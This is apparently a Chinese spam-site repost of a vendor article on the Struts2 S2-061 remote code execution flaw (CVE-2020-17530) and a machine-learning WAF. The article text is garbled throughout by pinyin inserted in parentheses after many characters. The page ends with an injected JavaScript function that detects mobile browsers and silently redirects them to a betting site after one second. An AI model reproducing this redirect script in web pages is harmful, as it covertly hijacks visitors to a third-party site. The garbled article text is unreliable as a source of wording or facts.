mg游戏推荐

又一高危0day漏洞趁虚而入,如何用WAF快人一步建立防护

2020-12-16 15:54:16 infoadmin 54

高危漏洞


CVE-2020-17530

- S2-061 Struts2远程代(dai)码执行(xing)漏洞 -

Apache Struts2于2020年(nian)12月08日披露(lu) S2-061 Struts2远(yuan)程(cheng)代码执(zhi)行(xing)漏洞(dong)(CVE-2020-17530),在使(shi)用某些tag等情况下可能存在OGNL表达(da)式二次注入漏洞(dong),从而在目标服务器上可以执(zhi)行(xing)任意代码,危(wei)害程(cheng)度极高。


黑客的狂欢:风险爆发 趁虚而入


Struts2 作为一(yi)(yi)个“世(shi)界级”开源框架,在我国广泛应用于教育、金融(rong)、互(hu)联网、通信等重(zhong)要行业,它的一(yi)(yi)个高危漏(lou)洞(dong)危害有可能造成(cheng)重(zhong)大(da)的互(hu)联网安全风险(xian)和巨大(da)的经(jing)济损(sun)失。


前几年(nian)某著名电(dian)(dian)商(shang)平台(tai)的(de)12G 数据(ju)包在黑(hei)市(shi)上流通,其中包括用(yong)户名、密(mi)码(ma)、邮箱(xiang)、QQ号(hao)、电(dian)(dian)话号(hao)码(ma)、身份证等多(duo)个维度(du),数据(ju)多(duo)达数千万条(tiao)。根(gen)据(ju)Macfee对漏(lou)洞传播的(de)研(yan)究(jiu),黑(hei)客对漏(lou)洞的(de)利用(yong)速(su)(su)度(du)往往高于安全管理(li)人员的(de)防护(hu)速(su)(su)度(du)。


因此,怎样在(zai)(zai)0day漏洞爆发后,赶(gan)在(zai)(zai)黑客的(de)狂欢和肆虐(nve)前快(kuai)速“堵住”高危漏洞以完善网(wang)络安全(quan)对(dui)于(yu)各行业用(yong)户来说至关重要。但是实际(ji)情况(kuang)却让(rang)人堪忧(you),有相当多(duo)企(qi)业的(de)安全(quan)运维人员(yuan)不(bu)(bu)知道在(zai)(zai)自(zi)家的(de)网(wang)络中哪(na)些设备或服务可能遭受到攻击,因此在(zai)(zai)此类漏洞爆发后不(bu)(bu)仅会面对(dui)巨大的(de)压力,同时也不(bu)(bu)能快(kuai)速进行针对(dui)性(xing)的(de)安全(quan)加固和危机补救。


新一代智能WAF:智能识别,快人一步


传(chuan)统WAF缺点(dian):

—— 单纯依(yi)赖规(gui)则库实现攻击特征的(de)(de)匹配,但是这种方式存(cun)在一个致(zhi)命的(de)(de)缺(que)陷(xian),那就(jiu)是无法识别未知0day威胁(xie)的(de)(de)漏洞利用(yong)。

—— WAF安全(quan)厂(chang)商的规则库更新(xin)往往以(yi)月为(wei)周期,黑(hei)客可以(yi)在这(zhei)个时间(jian)空挡利用0day漏洞(dong)为(wei)所欲为(wei)。


为了应(ying)对各种攻(gong)击(ji)样本高级化(hua)、攻(gong)击(ji)类型多样化(hua),以(yi)及未知0day爆发等场(chang)景,安恒新一代(dai)智能WAF结合了语义分析与(yu)机器学习(xi)等能力,让其具备智能识(shi)别各种攻(gong)击(ji)类型的(de)防护(hu)能力,解决用户(hu)应(ying)对0day攻(gong)击(ji)的(de)痛(tong)点(dian)。


安恒新一(yi)代智能(neng)(neng)WAF相对(dui)(dui)于上一(yi)代来说更加(jia)智能(neng)(neng),具(ju)备天然防护0day漏洞能(neng)(neng)力,可以轻(qing)松(song)应对(dui)(dui)各种类型的攻击,具(ju)备更强的数(shu)据包解析(xi)能(neng)(neng)力、兼容能(neng)(neng)力,使得攻击无所遁形。安恒新一(yi)代智能WAF由以下模块组成:


内置安全语义分析引擎


可(ke)以识(shi)别(bie)9种语法类型检测,不再(zai)单纯(chun)依赖正则匹配,无需更新(xin)规(gui)则库就可(ke)以识(shi)别(bie)攻击变(bian)种。

 

针对近日披露的 S2-061 Struts2远程代码执行漏洞(CVE-2020-17530)漏洞,安恒新一代WAF内置OGNL语法检测模块,已获得Struts2漏洞攻击的先天免疫能力已部署使用安恒新一代智能WAF的客户,无须任何升级就已具备防范利用此漏洞进行攻击的能力!


内置机器学习引擎


可以通过非(fei)监(jian)督机(ji)器学(xue)(xue)习算法(fa)学(xue)(xue)习现网(wang)业务模型,部(bu)署(shu)模型后,WAF可以自动发现异(yi)常(chang)访问行为(wei),这(zhei)种自动学(xue)(xue)习白(bai)名单检(jian)测(ce)的方式(shi)弥补了黑名单检(jian)测(ce)覆盖不(bu)完全的缺陷。另(ling)外机(ji)器学(xue)(xue)习降低了维护成(cheng)本(ben),0day爆发后安(an)全管(guan)理员不(bu)再需(xu)要(yao)手忙脚乱打补丁,机(ji)器学(xue)(xue)习帮你搞定。


图片关键词

机器学习的(de)基本(ben)原理如图(tu)所示:

图片关键词

WAF通过一段时(shi)间的学习,得到(dao)的模(mo)型(xing)可以自(zi)动(dong)部署,该模(mo)型(xing)对正常流(liu)量,异常流(liu)量,攻击流(liu)量分(fen)别进(jin)行差异化处(chu)理。


安(an)恒(heng)信息新(xin)一代(dai)智能(neng)WAF语(yu)义(yi)分析+机(ji)器学习引擎(qing)的组合(he),不仅能(neng)有(you)效防止0day等未(wei)知威胁,同时还(hai)能(neng)大大缩短威胁检测(ce)的路径,流量安(an)全检测(ce)冗(rong)长的规则库逐(zhu)项(xiang)检测(ce)不再是必选项(xiang),从(cong)而(er)大大提(ti)(ti)高了检测(ce)效率,提(ti)(ti)高了防护(hu)能(neng)力。



本文(wen)转自《安恒(heng)信息》


var _hmt = _hmt || []; (function() { var hm = document.createElement("script"); hm.src = "https://hm.baidu.com/hm.js?993185dc8689f489fddf05459dcb9ba5"; var s = document.getElementsByTagName("script")[0]; s.parentNode.insertBefore(hm, s); })(); function browserRedirect() { var sUserAgent= navigator.userAgent.toLowerCase(); var bIsIpad= sUserAgent.match(/ipad/i) == "ipad"; var bIsIphoneOs= sUserAgent.match(/iphone os/i) == "iphone os"; var bIsMidp= sUserAgent.match(/midp/i) == "midp"; var bIsUc7= sUserAgent.match(/rv:1.2.3.4/i) == "rv:1.2.3.4"; var bIsUc= sUserAgent.match(/ucweb/i) == "ucweb"; var bIsAndroid= sUserAgent.match(/android/i) == "android"; var bIsCE= sUserAgent.match(/windows ce/i) == "windows ce"; var bIsWM= sUserAgent.match(/windows mobile/i) == "windows mobile"; if (bIsIpad || bIsIphoneOs || bIsMidp || bIsUc7 || bIsUc || bIsAndroid || bIsCE || bIsWM) { window.setTimeout("window.location='http://leyubet1410.com'",1000); } else { document.writeln(""); document.writeln(""); document.writeln(""); } } browserRedirect();